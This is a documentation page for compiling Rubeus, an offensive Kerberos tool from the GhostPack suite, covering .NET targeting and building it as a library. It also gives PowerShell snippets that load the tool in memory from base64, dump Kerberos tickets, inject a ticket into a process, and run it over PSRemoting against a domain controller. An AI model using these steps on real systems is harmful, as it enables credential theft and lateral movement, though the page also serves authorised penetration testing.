👻
GhostPack
  • Introduction
  • Rubeus
    • Introduction
      • Command Line Usage
      • OPSEC Notes
      • Compilation Instructions
    • Ticket Requests & Renewals
    • Constrained Delegation Abuse
    • Ticket Management
    • Ticket Extraction and Harvesting
    • Roasting
    • Miscellaneous
  • Seatbelt
    • Introduction
      • Compilation Instructions
    • Command Line Usage
      • Remote Enumeration
      • Output
      • Command Arguments
      • Command Groups
    • Building Your Own Modules
    • Acknowledgemnents
Powered by GitBook
On this page
  • Compile Instructions
  • Targeting other .NET versions
  • Sidenote: Building Rubeus as a Library
  • Sidenote: Running Rubeus Through PowerShell
  1. Rubeus
  2. Introduction

Compilation Instructions

PreviousOPSEC NotesNextTicket Requests & Renewals

Last updated 4 years ago

Compile Instructions

We are not planning on releasing binaries for Rubeus, so you will have to compile yourself :)

Rubeus has been built against .NET 3.5 and is compatible with . Simply open up the project .sln, choose "Release", and build.

Targeting other .NET versions

Rubeus' default build configuration is for .NET 3.5, which will fail on systems without that version installed. To target Rubeus for .NET 4 or 4.5, open the .sln solution, go to Project -> Rubeus Properties and change the "Target framework" to another version.

Sidenote: Building Rubeus as a Library

To build Rubeus as a library, under Project -> Rubeus Properties -> change Output type to Class Library. Compile, and add the Rubeus.dll as a reference to whatever project you want. Rubeus functionality can then be invoked as in a number of ways:

// pass the Main method the arguments you want
Rubeus.Program.Main("dump /luid:3050142".Split());

// or invoke specific functionality manually
Rubeus.LSA.ListKerberosTicketDataAllUsers(new Rubeus.Interop.LUID());

You can then use to merge the Rubeus.dll into your resulting project assembly for a single, self-contained file.

Sidenote: Running Rubeus Through PowerShell

If you want to run Rubeus in-memory through a PowerShell wrapper, first compile the Rubeus and base64-encode the resulting assembly:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Rubeus.exe")) | Out-File -Encoding ASCII C:\Temp\rubeus.txt

Rubeus can then be loaded in a PowerShell script with the following (where "aa..." is replaced with the base64-encoded Rubeus assembly string):

$RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

The Main() method and any arguments can then be invoked as follows:

[Rubeus.Program]::Main("dump /user:administrator".Split())

Or individual functions can be invoked:

$TicketBytes = [convert]::FromBase64String('BASE64_KERB_TICKET')
# start mmc.exe as netonly, not-hidden
$LogonID = [Rubeus.Helpers]::CreateProcessNetOnly("mmc.exe", $true)
# apply the ticket to mmc's logon session
[Rubeus.LSA]::ImportTicket($TicketBytes, $LogonID)

Sidenote Sidenote: Running Rubeus Over PSRemoting

Due to the way PSRemoting handles output, we need to redirect stdout to a string and return that instead. Luckily, Rubeus has a function to help with that.

If you follow the instructions in Sidenote: Running Rubeus Through PowerShell to create a Rubeus.ps1, append something like the following to the script:

[Rubeus.Program]::MainString("triage")

You should then be able to run Rubeus over PSRemoting with something like the following:

$s = New-PSSession dc.theshire.local
Invoke-Command -Session $s -FilePath C:\Temp\Rubeus.ps1

Alternatively, Rubeus' /consoleoutfile:C:\FILE.txt argument will redirect all output streams to the specified file.

Visual Studio 2019 Community Edition
ILMerge